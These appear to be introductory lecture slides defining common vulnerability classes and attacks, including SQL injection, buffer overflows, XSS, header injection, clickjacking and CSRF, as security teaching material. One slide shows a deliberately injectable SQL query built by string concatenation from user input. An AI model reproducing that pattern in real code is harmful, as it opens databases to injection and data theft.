Exploitation Methods

D R . J A MA L A N A S I R
Different Methods for exploiting Vulnerabilities

Vulnerabilities can be exploited by a variety of methods:

◦ SQL injection
◦ buffer overflows
◦ cross-site scripting (XSS) and
◦ open-source exploit kits

- look for known vulnerabilities and security weaknesses in web

applications.
SQL injection
• SQL injection is a code injection technique that might destroy your
database.

• SQL injection is one of the most common web hacking techniques.

• SQL injection is the placement of malicious code in SQL statements, via

web page input.
SQL injection…
A successful SQL injection attack can result in unauthorized
access to sensitive data, such as:
• Passwords.
• Credit card details.
• Personal user information.
SQL injection…
SQL injection usually occurs when you ask a user for input, like their
username/userid

-instead of a name/id, the user gives you an SQL statement that you
will unknowingly run on your database.
Example:
txtUserId = getRequestString("UserId");
txtSQL = "SELECT * FROM Users WHERE UserId = " + txtUserId;
Buffer Overflow
Buffers are memory storage regions that temporarily hold data while it is being
transferred from one location to another.
A buffer overflow attack is a common cyber attack that

◦ deliberately exploits a buffer overflow vulnerability where user-controlled

data is written to memory.

◦ By submitting more data in the allocated memory block, the attacker can
overwrite data.
Buffer Overflow…
Buffer Overflow, also known as a buffer overrun, buffer overflow occurs when
the amount of data in the buffer exceeds its storage capacity.

That extra data overflows into adjacent memory locations and corrupts or
overwrites the data in those location.
Cross-site scripting (XSS)
• Cross-site scripting (XSS) occurs when hackers execute malicious
JavaScript within a victim's browser.

• XSS is a client-side vulnerability that targets other application

users, while SQL injection is a server-side vulnerability that
targets the application's database.
open-source exploit kits
An exploit kit or exploit pack is a type of toolkit:

◦ cybercriminals use to attack vulnerabilities in systems so they can

distribute malware or

◦ perform other malicious activities

Categories of Vulnerabilities
Vulnerabilities can be classified into six broad categories:
1. Hardware
2. Software
3. Network
4. Personnel
5. Physical Site
6. Organizational
1. Hardware
Any susceptibility to
➢ humidity
➢ dust
➢ soiling
➢ natural disaster
Hardware….
➢ Poor encryption
• Poor encryption may use keys that are too short, too simple, or too
predictable, making them easier to crack.

• Cryptanalysis attacks exploit the flaws or weaknesses of the encryption

algorithm to break it.

• Poor encryption may use algorithms that have been proven to be insecure,
outdated, or compromised.
➢ Firmware vulnerability
• Firmware refers to the software embedded in hardware devices that provide
instructions for their operation.

• Vulnerabilities occur when flaws or weaknesses are present in the

firmware's code, which allows attackers to exploit them for malicious
purposes.
2. Software
• Insufficient testing
• Inadequate/insufficient testing before deployment can leave code with hidden security issues that
are only found later.

• lack of audit trail

(An audit trail is a series of records of computer events, about an operating
system, an application, or user activities)

• design flaws (a design-related product property that

leads to reduced product quality)
2. Software…
• Memory safety violations (buffer overflows, over-reads,
dangling pointers)
• Memory safety is the state of being protected from various software bugs and security
vulnerabilities when dealing with memory access, such as buffer overflows and dangling
pointers.
2. Software…
• For example, Java is said to be memory-safe because its runtime error detection checks
array bounds and pointer dereferences.

• In contrast, C and C++ allow arbitrary pointer arithmetic with pointers implemented as
direct memory addresses with no provision for bounds checking, and thus are
potentially memory-unsafe

Buffer Over Read: an anomaly where a program, while reading data from
a buffer, overruns the buffer's boundary and reads (or tries to read) adjacent
memory.
2. software…
• Input validation errors (code injection, cross-site
scripting (XSS)
• Input validation errors occur when websites fail to properly validate user
input, leaving them vulnerable to various attacks such as
• SQL injection
• Cross-site scripting (XSS) and
• Command injection

making them a significant threat to web security.

2.software…
• Email injection
• Email injection is a vulnerability that lets a malicious hacker abuse email-related
functionality, such as email contact forms on web pages, to send malicious email content
to arbitrary recipients.

• Because email injection is based on injecting end-of-the-line characters, it is sometimes

considered a type of CRLF injection attack.

• Email injection is also called email header injection, SMTP header injection, or mail
command injection.
 2. software…
Dangling pointer: Dangling pointer is a pointer that does not point to a valid object of the appropriate
type. These are special cases of memory safety violations. More generally, dangling references and wild
references are references that do not resolve to a valid destination.
2. Software…
• Format string attacks
• The Format String exploit occurs when the submitted data of an
input string is evaluated as a command by the application.

• A format string vulnerability is a type of software bug in which user input is

utilized as the format argument for functions like printf, scanf, or others
within the same family.
2. software…
• HTTP header injection
• The HTTP header injection vulnerability is a web application security term
that refers to a situation when the attacker tricks the web application into
inserting extra HTTP headers into legitimate HTTP responses.

• HTTP header injection is a technique that can be used to facilitate malicious

attacks such as cross-site scripting, web cache poisoning, and more.

• These, in turn, may lead to information disclosure, use of your application in

phishing attacks, and other severe consequences.
Phishing

Phishing is a type of cyberattack that uses fraudulent emails, text

messages, phone calls or websites to trick people into sharing
sensitive data.
Web cache poisoning?
Web cache poisoning is an advanced technique whereby:

◦ an attacker exploits the behavior of a web server and cache so that a

harmful HTTP response is served to other users.
HTTP response splitting

HTTP response splitting is a form of web application vulnerability:

◦ resulting from the failure of the application or

◦ its environment to properly sanitize input values.
SQL injection
SQL injection is a code injection technique that might destroy your database.
SQL injection is one of the most common web hacking techniques.
SQL injection is the placement of malicious code in SQL statements, via web page input.
2. Software…
•Privilege-confusion bugs:
• that enable the attacker to gain more access than they should be allowed.

•For example:
• (clickjacking, cross-site request forgery, FTP bounce
attack)
Clickjacking
Clickjacking is an attack that tricks a user into clicking a webpage element which is invisible or
disguised as another element.
This can cause users to innocently download malware, visit malicious web pages, provide
credentials or sensitive information, transfer money, or purchase products online.
Clickjacking is an attack that tricks users into thinking they are clicking on one thing when in fact,
they are clicking on something else.
Typically, clickjacking is performed by displaying an invisible page or HTML element, inside an
iframe, on top of the page the user sees.
Cross-site request forgery
Cross-Site Request Forgery (CSRF) is an attack that forces an end user to execute
unwanted actions on a web application in which they’re currently authenticated.

A Cross-Site Request Forgery (CSRF) attack occurs when a malicious web site,
email, blog, instant message, or program tricks an authenticated user's web
browser into performing an unwanted action on a trusted site.
FTP bounce attack
An FTP Bounce Attack is a type of network attack that exploits the File Transfer
Protocol (FTP) to send outbound traffic to a device other than the intended
server.